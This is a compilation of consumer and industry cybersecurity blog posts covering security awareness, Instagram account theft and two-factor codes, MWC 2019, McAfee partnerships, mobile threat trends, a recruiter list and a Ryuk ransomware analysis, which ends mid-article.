When it comes to physical safety, crime has become as international and diverse as everything else, and awareness has risen not only in companies but also in homes; people accept that safety costs something, as the uptake of home security systems shows.

How does cyber security compare? Internet access now reaches deeper into enterprises, homes and mobile life; smartphones and tablets keep evolving; communication channels have multiplied across email, SMS, MMS and instant messaging apps; and the number of people using ICT tools keeps growing rapidly. Yet awareness of the risk of information theft remains largely subconscious.

There are two major reasons it stays below the surface. The first is a lack of awareness of cyber risk: users enjoy the convenience but rarely get to see what the risks actually look like, so the lack of understanding persists. The second is mistaken belief. Thoughts such as “nobody would bother with me” or “I’m using antivirus software, so I am OK” lower people’s guard.

Both the lack of recognition of cyber risk and the mistaken beliefs are problems of cyber security literacy. In other words, what matters is understanding the risks correctly, spreading that understanding correctly, and so avoiding harm.

Increase cyber security literacy

Because attack methods keep growing more sophisticated and diverse, it is currently impossible to prevent cyber attacks perfectly. To limit the damage they cause, organizations need both technical security measures and higher cyber security literacy and risk awareness among their users.

Raising literacy means that everyone who uses a computing device acquires correct knowledge of cyber risk and learns how to respond. Training is equally important for making that knowledge and those countermeasures stick. The methods are described below:

Creation and strong enforcement of Cybersecurity Policy

Before working on employee literacy, the organization should formulate an information security policy. The policy sets out the security principles and rules of conduct for the enterprise, along with the basic questions of which threats to defend against and which information assets to protect. A clear statement of the purpose and content of cyber security gives employees both the motivation and the goal for improving their literacy.

Implementation of Cyber ​​Security Education

Antivirus software, the most commonly cited security measure, addresses known attacks but cannot cover unknown attacks or human error. Companies should therefore train all employees in the basics of cyber risk and in real attack cases. Employees are the front line of IT security, and some organizations forget to instill that principle in their teams.

Training and more importantly, retraining programs need to exist

Many companies now run training exercises without telling employees in advance. The typical form is a simulated phishing email sent to staff to measure how far security awareness has penetrated, for example by checking who opens a dummy “phishing” message. Such realistic simulation is effective at building experience, but on its own it only serves as a reminder of the risk. It is just as important to draw lessons from the simulation and to practice the response, using cross-functional training built on how past incidents were handled. Note that a phishing simulation is not the same thing as a penetration test: a penetration test is a simulated attack on systems and networks to find exploitable weaknesses, whereas a phishing simulation measures how people respond.

Everyone will experience a cyber attack of some scale; it is “the new normal” in today’s world. To minimize the damage as a company, it is ultimately necessary to raise every employee’s cyber security literacy and awareness. Day to day, the best protection a company can give itself is to empower all employees to stay calm, stay aware and, most important of all, think critically: “Did the boss really send this email with attachment.x?” Asking the question is safer than clicking a questionable link or opening a questionable attachment. Skepticism strengthens cyber security.

The post Top 3 Cybersecurity Measures: Skepticism, Awareness and Training appeared first on .

Instagram User? Ways To Prevent From Falling For Account Theft

Like Twitter and Facebook before it, Instagram (itself a Facebook property) has seen massive growth in its user base over the last three years. The Instagram app started as an iOS exclusive, but once it opened its doors to Android it exploded to a whole new level, becoming a rival not only to Twitter but to its parent company, Facebook. The downside of being a very popular app is that it attracts not only typical Android and iOS users but also those who want to “profit” from its trove of data for less honorable reasons: the criminal hacker community.

Before discussing Instagram’s cyber security readiness, we need to lay a foundation: for all practical purposes, an account “getting hacked” is a misnomer, and the correct term is “stolen.” A platform the size of Instagram stores its users’ passwords as salted, one-way password hashes, not as recoverable data. A hash cannot be reversed to recover the password; an attacker who obtains the database can only guess candidate passwords, hash each guess with its salt, and compare. With a slow hashing function that makes every guess expensive, and a strong password, that process would take decades or longer even on today’s fastest hardware, and no attacker waits 25, 50 or 75 years for it to finish. Note that this is hashing, not encryption: an encryption standard like AES-256 protects data that someone with the key is meant to read back, which is exactly what a password store must never allow.

When a user claims that his Facebook, Twitter or Instagram account was hacked, the most probable explanation is that he fell for a phishing attempt. Phishing messages are sent by an attacker to a target in order to steal enough information to impersonate the user. This may take the form of a malicious form that harvests credentials, a keylogger infection, or a link that forwards the user to a convincing copy of the genuine site.

Of course, the more popular a user is on Instagram (or any social media platform), the bigger the chance that troublesome individuals on the platform will target him. It may begin with a friendly exchange of pleasantries, until the attacker has gained the target’s trust; once that trust is established, redirecting the target to a phishing link or malicious website becomes easy. A healthy level of skepticism about whom to trust online should be practiced by everyone, not only by popular personalities.

One of the best practices for social media is to keep separate pages for personal and business/professional use. Contacts are then stored separately: professional contacts are not notified when you post something categorized as personal, and personal contacts do not see your professional content. The professional page can also be locked down so that only your professional contacts can view it, filtering out people who are merely curious. Do not give third parties even a small window of opportunity to take over your account; take control of your own security. As an added layer, all mainstream social media platforms offer two-factor authentication: a one-time code, sent to your registered mobile number or generated by an authenticator app, is required to complete the login, which adds a strong layer on top of a plain password. Where the platform offers it, prefer an authenticator app or a hardware security key over SMS, since SMS codes can be captured through SIM-swap fraud.
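Added example, not part of the original post: the time-based one-time code that authenticator apps generate, which is the app-based alternative to the SMS code mentioned above. It implements HOTP (RFC 4226) and TOTP (RFC 6238) with the standard library and verifies a code with a small clock-skew window and a constant-time comparison. `RFC_TEST_KEY` is the shared secret from the RFCs’ published test vectors, and the base32 helper accepts the unpadded form authenticator apps exchange.

```python
import base64
import hashlib
import hmac
import struct
import time

# Shared secret from the RFC 4226 / RFC 6238 test vectors (not a real account secret).
RFC_TEST_KEY = b"12345678901234567890"


def hotp(key, counter, digits=6, algorithm=hashlib.sha1):
    """RFC 4226 HOTP: dynamic truncation of HMAC(key, counter) to `digits` decimals."""
    mac = hmac.new(key, struct.pack(">Q", counter), algorithm).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(key, at=None, step=30, digits=6):
    """RFC 6238 TOTP: HOTP with the counter derived from the clock."""
    at = time.time() if at is None else at
    return hotp(key, int(at // step), digits)


def verify_totp(key, code, at=None, step=30, window=1):
    """Accept codes from the current step and `window` steps either side, so a
    slightly skewed phone clock still works; each comparison is constant-time."""
    at = time.time() if at is None else at
    counter = int(at // step)
    return any(
        hmac.compare_digest(hotp(key, c), code)
        for c in range(counter - window, counter + window + 1)
    )


def key_from_base32(secret):
    """Authenticator apps exchange the shared secret as base32, usually unpadded
    and sometimes grouped with spaces; normalise and decode it."""
    secret = secret.strip().replace(" ", "").upper()
    return base64.b32decode(secret + "=" * (-len(secret) % 8))


if __name__ == "__main__":
    key = key_from_base32("GEZD GNBV GY3T QOJQ GEZD GNBV GY3T QOJQ")  # == RFC_TEST_KEY
    code = totp(key)
    print("current code:", code, "accepted:", verify_totp(key, code))
    print("RFC vector at t=59:", totp(key, at=59, digits=8))  # 94287082
```

The server side stores the same secret and runs `verify_totp`; because the code depends on the secret and the clock rather than on anything transmitted to the phone, there is no SMS message for a SIM-swapper to intercept, which is the reason for preferring an app over text-message codes. A replay check that rejects a code already accepted for the same time step is the one addition a production verifier still needs.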

The post Instagram User? Ways To Prevent From Falling For Account Theft appeared first on .

What MWC 2019 Shows Us About the Future of Connectivity

The time has come to say goodbye to Barcelona as we wrap up our time here at Mobile World Congress (MWC). Although it’s hard to believe that the show is already over, MWC 2019 managed to deliver a slew of showstoppers that captured our attention. Here are some of my main takeaways from the event:

Foldable Phones Are the Future

 MWC is an opportunity for telecommunications companies, chipmakers, and smartphone firms to show off their latest and greatest innovations, and they sure delivered this year. One particular device that had the show floor buzzing was the Huawei Mate X, a 5G-enabled smartphone that folds out to become an 8-inch tablet. Additionally, Samsung revealed its plans to hold a press event in early April for its foldable smartphone, the Galaxy Fold. Unlike Huawei’s Mate X, the Galaxy Fold bends so that it closes like a book. Although neither of these devices is available to the public yet, they’ve definitely made a bold statement when it comes to smartphone design.

Smart Home Technology Goes Mobile

Google is one company taking advantage of smartphone enhancements by putting its Google Assistant into the Android texting app. Assistant for Android Messages allows slices of Google search results to be laid out for users based on their text messages. For example, if one user texted another asking to grab some lunch, a bubble would pop up authorizing Assistant to share suggestions for nearby restaurant locations. While Assistant for Android currently only works for movies and restaurants, we can imagine how this technology could expand to other facets of consumer lives. This addition also demonstrates how AI is slowly but surely making its way onto almost every high-end phone through its apps and other tools.

Enhancing the Gaming Experience with 5G, VR, and AR

Not to be shown up, game developers also made a statement by using 5G technology to bring gamers into a more immersive gaming environment. Mobile game developer Niantic, creator of Pokémon Go and the upcoming Harry Potter: Wizards Unite app, is already working on games that will require a 5G upgrade. One such prototype the company showcased, codenamed Neon, allows multiple people in the same place to play an augmented reality (AR) game at the same time. Each player's phone shows them the game's graphics superimposed on the real world and allows the players to shoot each other, duck and dodge, and pick up virtual items, all in real time.

Niantic wasn't the only one looking to expand the gaming experience with the help of 5G. At the Intel and Nokia booths, Sony set up an Oculus Rift VR game inspired by Marvel and Sony's upcoming film Spider-Man: Far From Home. Thanks to the low latency and real-time responsiveness of 5G, one player in the Nokia booth was able to race the other player in the Intel booth as if they were swinging through spiderwebs in Manhattan. Players were able to experience how the next generation of wireless technology will allow them to participate in a highly immersive gaming experience.

Bringing 4G and 5G to the Automotive Industry

Gaming isn’t the only industry that’s getting a facelift from 5G. At the show, Qualcomm announced two new additions to their automotive platform: the Qualcomm Snapdragon Automotive 4G and 5G Platforms. One of the main features of these platforms is vehicle-to-everything communication, or C-V2X, which allows a car to communicate with other vehicles on the road, roadside infrastructure, and more. In addition, the platforms offer a high-precision, multi-frequency global navigation satellite system, which will help enable self-driving implementations. The platforms also include features like multi-gigabit cloud connectivity, high bandwidth low latency teleoperations support, and precise positioning for lane-level navigation accuracy. These advancements in connectivity will potentially help future vehicles to improve safety, communications, and overall in-car experience for consumers.

Securing Consumers On-the-Go

The advancements in mobile connectivity have already made a huge impact on consumer lifestyles, especially given the widespread adoption of IoT devices and smart gadgets. But the rise in popularity of these devices has also caught the interest of malicious actors looking to access users’ networks. According to our latest Mobile Threat Report, cybercriminals look to trusted devices to gain access to other devices on the user’s home network. For example, McAfee researchers recently discovered a vulnerability within a Mr. Coffee brand coffee maker that could allow a malicious actor to access the user’s home network. In addition, they also uncovered a new vulnerability within BoxLock smart padlocks that could enable cybercriminals to unlock the devices within a matter of seconds.

And while consumers must take the necessary security steps to combat vulnerabilities such as these, we at McAfee are also doing our part to help users everywhere remain secure. For instance, we've recently extended our partnerships with both Samsung and Türk Telekom in order to overcome some of these cybersecurity challenges. Together, we're working to secure consumers from cyberthreats on Samsung Galaxy S10 smartphones and provide McAfee Safe Family protection for Türk Telekom's fixed and mobile broadband customers.

While the likes of 5G, bendable smartphones, and VR took this year’s tradeshow by storm, it’s important for consumers to keep the cybersecurity implications of these advancements in mind. As the sun sets on our time here in Barcelona, we will keep working to safeguard every aspect of the consumer lifestyle so they can embrace improvements in mobile connectivity with confidence.

To stay on top of McAfee’s MWC news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post What MWC 2019 Shows Us About the Future of Connectivity appeared first on McAfee Blogs.

McAfee Partners With Telefónica To Help Secure Consumers Worldwide

These days, cyberattacks can feel relentless. Due to the interconnected nature of the world we live in, cybercriminals have managed to infiltrate our personal devices, our networks, and even our homes. That’s why we at McAfee believe it’s important now more than ever to secure every facet of the modern consumer lifestyle. And we’ve partnered with Telefónica to do just that.

This partnership first began back in February of last year, when ElevenPaths, Telefónica's Cyber Security Unit, and McAfee announced that we were working together to reinforce the online security of Telefónica's broadband and mobile customers across multiple markets. The partnership covers Europe and Latin America, with plans to progressively roll out solutions in the different countries where Telefónica operates. It is the first time a telecommunications company has delivered a security service to all of its customers, regardless of where they connect from. Fast forward to the present day, and this partnership has only expanded. The global product developed by Telefónica and powered by McAfee was first launched in Spain as Movistar Conexión Segura, a service that protects home and mobile customers' connectivity. Telefónica protects Fusión customers' home connections with a smart router, thanks to the ElevenPaths solution powered by McAfee Secure Home Platform, which enables seamless security and easy activation. Conexión Segura is also available for Movistar mobile customers, including network protection and one license of Seguridad Dispositivo, a multi-device security protection. Only a few weeks after Spain, Movistar Argentina launched the solution for its fixed and mobile customers. These services help realize Telefónica's "Security by Default" strategy, offering customers a more robust security solution that protects against threats like viruses, malware, phishing, and emerging IoT threats.

Telefónica and McAfee’s 360 partnership is dedicated to protecting the productivity of consumers everywhere. “This agreement gives customers current and contextual information on their cybersecurity status so they can stay connected with confidence,” said Pedro Pablo Pérez, Global Security VP of Telefónica and CEO of ElevenPaths, Telefónica Cybersecurity Unit.

ElevenPaths and McAfee's joint vision to create a more secure tomorrow brings us a step closer to stopping widespread cyberattacks. By joining forces to implement more robust security solutions around the world, we can ensure that our connectivity goes undisrupted. Because together is power.

To learn more about consumer security and our approach to it, be sure to follow us at @ElevenPaths and @McAfee.

The post McAfee Partners With Telefónica To Help Secure Consumers Worldwide appeared first on McAfee Blogs.

Open Backdoors and Voice Assistant Attacks: Key Takeaways from the 2019 Mobile Threat Report

These days, we seem to have a newfound reliance on all things 'smart.' We give these devices the keys to our digital lives, entrusting them with tons of personal information. In fact, we are so eager to adopt this technology that we connect 4,800 devices per minute to the internet, with no sign of slowing down. This is largely because smart devices make our lives easier and more enjoyable. But even though these devices are convenient for us, it's important to understand that they are also convenient for cybercriminals, given that they contain a treasure trove of personal data. To examine exactly how these hackers plan on capturing that data, we at McAfee have taken a deep dive into the mobile threat landscape in this year's Mobile Threat Report. In this report, we examine some of the most significant threat trends, including new spyware, mobile malware, and IoT attack surfaces. Let's take a look at these trends and how you can keep all your devices protected.

Operations RedDawn and FoulGoal

In our 2018 report, we predicted that attacks targeted toward mobile devices would increase, and everything from fake Fortnite apps to increased mobile malware has proven this to be true. However, two recent discoveries, Operation RedDawn and FoulGoal, prove just how targeted these attacks can really get. RedDawn, in particular, has set its sights on North Korean refugees, as the spyware attempts to copy photos, contacts, SMS messages, and other personal data belonging to the victim.

The latter attack, FoulGoal, actually occurred during last year’s World Cup, as the campaign used an app called Golden Cup to install spyware on victims’ devices. This app promised users live streams of games from the Russian 2018 FIFA World Cup, as well as a searchable database of previous World Cup records. In addition to stealing the user’s phone number, device details, and installed packages, FoulGoal also downloaded spyware to expand its infection into SMS messages, contacts, GPS details, and audio recordings.

A Virtual Backdoor

Our smartphones are now like remote controls for our smart homes, controlling everything from lights to locks to kitchen appliances. So, it was only a matter of time before cybercriminals looked for ways to trick users into leaving open a virtual backdoor. Enter TimpDoor, an Android-based malware family that does just that. First appearing in March 2018, it quickly became the leading mobile backdoor family, as it runs a SMiShing campaign that tricks users into downloading fake voice-messaging apps.

These virtual backdoors are now an ever-growing threat as hackers take advantage of the always-connected nature of mobile phones and other connected devices. Once distributed as Trojanized apps through app stores like Google Play, these backdoors can come disguised as add-on games or customization tools. And while most are removed fairly quickly from app stores, hackers can still pivot their distribution efforts and leverage popular websites in a socially engineered attack that tricks users into enabling installation from unknown sources.

The Voice Heard Around the Home

Around the world, there are already over 25 million voice assistants, or smart speakers, in use. From simple queries to controlling other IoT gadgets throughout the home, these devices play a big role in our living environments. But many of these IoT devices fail to pass even the most basic security practices, and have easily guessable passwords, notable buffer overflow issues, and unpatched vulnerabilities. This makes voice assistants an increasingly valuable and potentially profitable attack vector for cybercrime.

For a typical voice assistant in the home, the attack surface is quite broad. Cybercriminals could gain access to the microphone or listening stream, and then monitor everything said. Additionally, they could command the speakers to perform actions via other speaker devices, such as embedding commands in a TV program or internet video. Crooks could even alter customized actions to somehow aid their malicious schemes. However, some of the most pressing vulnerabilities can come from associated IoT devices, such as smart plugs, door locks, cameras, or connected appliances, which can have their own flaws and could provide unrestrained access to the rest of the home network.

The good news? We at McAfee are working tirelessly to evolve our home and mobile solutions to keep you protected from any current and future threats. Plus, there are quite a few steps you can personally take to secure your devices. Start by following these tips:

  • Delete apps at the first sign of suspicious activity. If an app requests access to anything outside of its service, or didn’t originate from a trusted source, remove it immediately from your device.
  • Protect your devices by protecting your home network. While we continue to embrace the idea of “smart homes” and connected devices, we also need to embrace the idea that with great connectivity, comes great responsibility to secure those connections. Consider built-in network security, which can automatically secure your connected devices at the router-level.
  • Keep your security software up-to-date. Whether it’s an antivirus solution or a comprehensive security suite, always keep your security solutions up-to-date. Software and firmware patches are ever-evolving and are made to combat newly discovered threats, so be sure to update every time you’re prompted to. Better yet, flip on automatic updates.
  • Change your device’s factory security settings. When it comes to products, many manufacturers don’t think “security first.” That means your device can be potentially vulnerable as soon as you open the box. By changing the factory settings you’re instantly upping your smart device’s security.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and 'Like' us on Facebook.

The post Open Backdoors and Voice Assistant Attacks: Key Takeaways from the 2019 Mobile Threat Report appeared first on McAfee Blogs.

Kicking Off MWC 2019 with Insights on Mobile Security and Growing Partnerships

We’ve touched down in Barcelona for Mobile World Congress 2019 (MWC), which is looking to stretch the limits of mobile technology with new advancements made possible by the likes of IoT and 5G. This year, we are excited to announce the unveiling of our 2019 Mobile Threat Report, our extended partnership with Samsung to protect Galaxy S10 smartphones, and our strengthened partnership with Türk Telekom to provide a security solution to protect families online.

Mobile Connectivity and the Evolving Threat Landscape

These days, it’s a rare occurrence to enter a home that isn’t utilizing smart technology. Devices like smart TVs, voice assistants, and security cameras make our lives more convenient and connected. However, as consumers adopt this technology into their everyday lives, cybercriminals find new ways to exploit these devices for malicious activity. With an evolving threat landscape, cybercriminals are shifting their tactics in response to changes in the market. As we revealed in our latest Mobile Threat Report, malicious actors look for ways to maximize their profit, primarily through gaining control of trusted IoT devices like voice assistants. There are over 25 million voice assistants in use across the globe and many of these devices are connected to other things like thermostats, door locks, and smart plugs. With this increase in connectivity, cybercriminals have more opportunities to exploit users’ devices for malicious purposes. Additionally, cybercriminals are leveraging users’ reliance on their mobile phones to mine for cryptocurrency without the device owner’s knowledge. According to our Mobile Threat Report, cybersecurity researchers found more than 600 malicious cryptocurrency apps spread across 20 different app stores. In order to protect users during this time of rapid IoT and mobile growth, we here at McAfee are pushing to deliver solutions for relevant, real-world security challenges with the help of our partners.

Growing Partnerships to Protect What Matters

Some cybersecurity challenges we are working to overcome include threats like mobile malware and unsecured Wi-Fi. This year, we’ve extended our long-standing partnership with Samsung to help secure consumers from cyberthreats on Samsung Galaxy S10 smartphones. McAfee is also supporting Samsung Secure Wi-Fi service by providing backend infrastructure to protect consumers from risky Wi-Fi. In addition to mobile, this partnership also expands to help protect Samsung smart TVs, PCs, and laptops.

We’ve also strengthened our partnership with Türk Telekom, Turkey’s largest fixed broadband ISP. Last year, we announced this partnership to deliver cross-device security protection. This year, we’re providing a security solution to help parents protect their family’s digital lives. Powered by McAfee Safe Family, Türk Telekom’s fixed and mobile broadband customers will have the option to benefit from robust parental controls. These controls will allow parents to better manage their children’s online experience and give them greater peace of mind.

We’re excited to see what’s to come for the rest of MWC, and how these announcements will help improve consumers’ digital experiences. It is our hope that by continuing to extend our relationships with technology innovators, we can help champion built-in security across devices and networks.

To stay on top of McAfee’s MWC news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Kicking Off MWC 2019 with Insights on Mobile Security and Growing Partnerships appeared first on McAfee Blogs.

Best Cybersecurity Search Firms & Recruiters 2019

As cybersecurity becomes more and more popular each day, it's also important to mention that there is a shortage of skilled people within the industry. Many recruiters create specific cybersecurity departments so they can stay competitive and fill the gap. According to Forbes, the cybersecurity market is expected to hit $170 billion by 2020, and cybersecurity jobs are expected to reach 6 million by the end of 2019. It's no secret that the rapid growth rate of the industry requires a professional approach from some of the best infosec recruiters.

In a recent interview, Karla Jobling from BeecherMadden (a top UK cybersecurity recruiter) revealed that at first cybersecurity companies wanted to hire as many people as possible. Now, however, they concentrate on finding not many people, but just the right people for the right position. It is extremely important for a recruiter to match the candidate's expectations with the requirements and the corporate culture of the client company.

List of best cybersecurity search firms for 2019

Shield Security Recruiters

A leading global recruiting firm focusing on the cyber security industry in the USA, Europe, APAC and LATAM. Shield Security Recruiters have the global expertise and knowledge to bring you the quality cyber security candidates you deserve, expect and need.

3P&T Security Recruiting

3P&T has been successful in recruiting people in various areas of cybersecurity. They are one of the best cybersecurity recruiters in the Seattle, USA area. A great UK-based company which is extremely trusted among infosec professionals in Europe. They are always ready to provide expert advice to their clients.

Alta Associates

Adeptis Group

Alta Associates is based in New Jersey, USA and performs custom searches for the most senior level executive roles in the cyber industry. They also deal with risk management, privacy, compliance and governance.

Acumin Consulting

The company is based in London, but operates internationally with a special focus on cybersecurity and risk management recruitment. They specialize in providing key infosec and law enforcement skills across all sectors.

Blackmere Consulting

This company focuses on quality, speed and cost effectiveness to provide a more specialized approach to sourcing the best talent in cybersecurity. Their services include direct hire, consulting, or hiring on a contract for a specific project.

Caliber Security Partners

Their specialty is recruiting and staff augmentation in the short or the long term. They establish trusting relationships with their clients to identify their true talent needs. Another good addition to our cybersecurity search firms list.

Computer Futures

The company provides a platform both for companies looking for potential talent and for people looking for a career in the cybersecurity industry. They have a dedicated cyber security and business risk team that provides individual solutions.

Cyber Exec

Cyber Exec is headquartered in Houston, Texas, but also operates internationally in cities like Tokyo and London. They definitely know how to find the best C-level employees.

CISORecruiter

As the name suggests, this company is a team of professionals that will take care of your needs and provide you with the right people for your cybersec company.

Cyber Security Recruiters

This company is among the best cybersecurity search firms in the state of Minnesota, USA, and has been in business since 2009.

Cyber 360 Inc.

Another top cybersecurity recruiter that works together with some of the biggest cybersecurity leaders and their teams to hire skilled information security professionals.

InfoSec People

The company was launched in 2008 and is currently one of the leading cybersecurity recruitment companies in the UK. You can easily find a role, find people, or find advice on their website.

KnownFour

Another UK company, with owners who have been in international recruiting services for more than 20 years. Their information security department works closely with experts to provide the perfect solution to their clients.

Redbud Cyber Security

Redbud has a national reach in the USA and sources all kinds of positions, from Analysts and Engineers to CISOs. They are well known within the industry and can provide some of the best cyber talent.

Security Recruiter

The firm serves clients globally in the fields of information security, corporate security, risk management, governance, compliance and business intelligence.

This was our latest list of cybersecurity search firms. We hope that you will find what you need. Feel free to contact us if you want to add a company to our list.

The post Best Cybersecurity Search Firms & Recruiters 2019 appeared first on CyberDB.

Ryuk, Exploring the Human Connection

In collaboration with Bill Siegel and Alex Holdtman from Coveware.

 

At the beginning of 2019, McAfee ATR published an article describing how the hasty attribution of Ryuk ransomware to North Korea was missing the point. Since then, industry peers have collectively discovered additional technical details on Ryuk's inner workings, the overlap between Ryuk and Hermes2.1, and a detailed description of how the ransomware is piggybacking on the infamous and ever-evolving Trickbot as a primary attack vector. In this blog post we have teamed up with Coveware to take a closer look at the adversary and victim dynamics of Ryuk ransomware. We structured our research using the Diamond threat model and challenged our existing hypotheses with fresh insights.

Introduction to The Diamond Model

Within cyber threat intelligence research, a popular approach is to model the characteristics of an attack using The Diamond Model of Intrusion Analysis. This model relates four basic elements of an intrusion: adversary, capability, infrastructure and victim.

For the Ryuk case described above the model can be applied as follows: "An Adversary, cyber-criminal(s), has a Capability (Ryuk ransomware) that is being spread via a TrickBot infection Infrastructure, targeting specific Victims."

Diamond model of Intrusion Analysis

The Diamond Model offers a holistic view of an intrusion that is a helpful guideline to shape the direction of intelligence research. By searching for relationships between two elements one can gather new evidence. For instance, by analyzing and reverse engineering a piece of malware one might uncover that a certain server is being used for command and control infrastructure, thus linking capability with infrastructure (as shown below).

Linking Infrastructure and Capability

Alternatively, one might search underground forums to find information on adversaries who sell certain pieces of malware, thus linking an adversary with a capability. For instance, finding the underground forum advertisement of Hermes2.1.

Linking Adversary and Capability

Analysis of Competing Hypotheses

In our earlier publication we explained The Analysis of Competing Hypotheses (ACH), the process of challenging formed hypotheses with research findings.
By following this method, we concluded that the strongest hypothesis is not the one with the most verifying evidence, but the one with the least falsifying evidence.

In order to construct a hypothesis with the least falsifying evidence, we welcome research published by our industry peers and assimilate insights that challenge our hypotheses. When we combined all the evidence with the links on the diamond model, we discovered that one essential link hadn't been made: the link between adversary and victim.

Seeking New Insights Between Adversary and Victim

Despite the published research, the direct link between adversary and victim remained relatively unexplored. Unlike most cybercrime, ransomware and digital extortion frequently create a strong social connection between adversary and victim. The adversary has certain needs and views the victim as the means to fulfill those needs. The connection between an adversary and victim often generates valuable insights, especially in cases where (extensive) negotiations take place.

Luckily, one of our NoMoreRansom partners, Coveware, specializes in ransomware negotiations and has gained valuable insights that help us link adversary and victim.

The social connection between Adversary and Victim

Ransom Amounts and Negotiations

By aggregating ransomware negotiation and payment data, Coveware is able to identify strain-specific ransomware trends. With regard to Ryuk, it should be noted that its ransom amounts average more than 10x the overall ransomware average, making it the costliest type of ransomware. Coveware also observed that some Ryuk ransoms were highly negotiable, while others were not. The bar-belled negotiation results generated an average ransom payment of $71k, a 60% discount from an average opening ask of $145k.

The bar-belled negotiation outcomes meant that some victims were stonewalled. These victims either lost their data or took on staggering financial risk to pay the ransom. The outcomes also imply that in certain cases the adversary would rather receive infrequent large windfalls (often in excess of 100BTC), while in other cases the adversary was keen to monetize every attack and accept lower amounts to ensure payment. This difference in modus operandi suggests that more than one cyber-criminal group is operating Ryuk ransomware.

Ransom Note and Negotiation Similarities and Differences

Similarities between Bitpaymer and Ryuk ransom notes have been observed before. While it is not uncommon for ransom notes to share similar language, sequences of phrases tend to remain within the same ransomware family. Slight copy+paste modifications are made to the ransom text as a variant is passed along to different groups, but large alterations are rarely made. Below is a comparison of a Bitpaymer initial email (left) and a standard Ryuk initial email (right).

A comparison of a Bitpaymer initial email (left) and a standard Ryuk initial email (right)

The shared language implies that text once unique to a Bitpaymer campaign was borrowed for a Ryuk campaign, possibly by an operator running simultaneous ransom campaigns of both Bitpaymer and Ryuk, or simply because imitation is the sincerest form of flattery.

Different Initial Email Response May Be Different Adversaries?

A more dramatic scripted communication difference has been observed in the initial email response from Ryuk adversaries. The initial email response is typically identical within ransomware families belonging to the same campaign. When significant differences in length, language, and initial ransom amount appear in the initial email response, we are comfortable assuming they belong to distinct groups with distinct modus operandi. This would mean that Ryuk is being spread by more than one actor group.
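The two observations above (phrases shared between Bitpaymer and Ryuk notes, and initial emails that are near-identical within one campaign but differ sharply between campaigns) can be made measurable. The following is an added example, not code from McAfee ATR or Coveware: it shingles each note into word trigrams, scores pairs with Jaccard similarity, and groups notes by single-linkage at a chosen threshold. The sample notes are constructed paraphrases for illustration only; the article shows the real notes only as images.

```python
import re
from itertools import combinations

# Constructed sample notes (not the real ransom notes). Two notes mimic one
# Ryuk campaign (same script, different contact), one mimics a Bitpaymer note
# that shares an opening paragraph, and one mimics a blunt second Ryuk group.
SAMPLE_NOTES = {
    "ryuk_campaign_a_1": (
        "Your network has been penetrated. All files on each host have been "
        "encrypted with a strong algorithm. Backups were encrypted or deleted. "
        "Write to email one for the price."
    ),
    "ryuk_campaign_a_2": (
        "Your network has been penetrated. All files on each host have been "
        "encrypted with a strong algorithm. Backups were encrypted or deleted. "
        "Write to email two for the price."
    ),
    "bitpaymer_sample": (
        "Your network has been penetrated. All files on each host have been "
        "encrypted with a strong algorithm. Contact us to get the price."
    ),
    "ryuk_campaign_b": "Price is 50 BTC. Pay and you get the decryptor.",
}


def shingles(text: str, n: int = 3) -> set:
    """Lowercase, strip punctuation, and return the set of word n-grams.

    Word trigrams are robust to the small copy+paste edits (an e-mail
    address, a price) that operators make while keeping phrase order intact.
    """
    tokens = re.findall(r"[a-z0-9]+", text.lower())
    return {tuple(tokens[i:i + n]) for i in range(len(tokens) - n + 1)}


def jaccard(a: set, b: set) -> float:
    """Jaccard similarity |A ∩ B| / |A ∪ B|; two empty sets count as identical."""
    if not a and not b:
        return 1.0
    return len(a & b) / len(a | b)


def pairwise_similarity(notes: dict, n: int = 3) -> dict:
    """Return {(name1, name2): similarity} for every unordered pair of notes."""
    sets = {name: shingles(text, n) for name, text in notes.items()}
    return {(x, y): jaccard(sets[x], sets[y]) for x, y in combinations(sets, 2)}


def cluster_notes(notes: dict, threshold: float, n: int = 3) -> list:
    """Greedy single-linkage grouping in insertion order.

    A note joins the first cluster that contains any member scoring at or
    above the threshold; otherwise it starts a new cluster. A high threshold
    separates campaigns; lowering it exposes borrowed boilerplate.
    """
    sets = {name: shingles(text, n) for name, text in notes.items()}
    clusters: list = []
    for name in sets:
        for cluster in clusters:
            if any(jaccard(sets[name], sets[m]) >= threshold for m in cluster):
                cluster.append(name)
                break
        else:
            clusters.append([name])
    return clusters


if __name__ == "__main__":
    for pair, score in sorted(pairwise_similarity(SAMPLE_NOTES).items(),
                              key=lambda kv: -kv[1]):
        print(f"{pair[0]:>18} vs {pair[1]:<18} {score:.3f}")
    print("campaigns @0.5 :", cluster_notes(SAMPLE_NOTES, 0.5))
    print("borrowing @0.4 :", cluster_notes(SAMPLE_NOTES, 0.4))
```

At 0.5 the two campaign-A notes group together while the Bitpaymer-style note stays apart; at 0.4 the shared opening paragraph pulls it into the same cluster, which is the borrowing the article describes.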

Below are two such Ryuk examples:

 

Post Payment Bitcoin Activity

A final indicator that multiple groups are running simultaneous Ryuk campaigns can be observed in the movement of bitcoin after it hits a ransom address. Surprisingly, despite the differences in negotiation outcome and initial communications, Coveware observed little difference between the BTC wallets (blacked out to protect victims) associated with the above cases. Initial comparison showed no meaningful discrepancy between the time of a ransom payment and the time of the corresponding withdrawal. Additionally, the distribution of funds upon withdrawal was consistently split between two addresses. Coveware will continue to monitor the funds associated with these campaigns for meaningful indicators.

Ryuk Negotiating Profiles

With few exceptions, the rest of the email replies during a Ryuk extortion negotiation are extremely short and blunt. Typical replies and retorts are generally less than 10 written words and often just a single number if the ransom amount is the point of discussion. This correspondence is unique to Ryuk.

One reply did contain quite a remarkable expression, "à la guerre comme à la guerre," to contextualize the methods and reasons for the cyber criminals' attacks on western companies. The French expression originates from the seventeenth century; it literally translates to "in war as in war" and loosely translates to "in harsh times one has to make do with what's available." The striking thing about this expression is that it is prominently featured in volume 30 of the collected works of the Soviet revolutionary leader Vladimir Lenin. Lenin uses the expression to describe the struggle of his people during the war against western capitalism.

This concept of “The capitalistic West versus the Poor east” is actually something McAfee ATR sees quite often expressed by cyber criminals from some of the Post-Soviet republics. This expression may be a clear indicator of the origin and cultural view of the criminals behind Ryuk.

Ryuk poses existential risk to certain industries

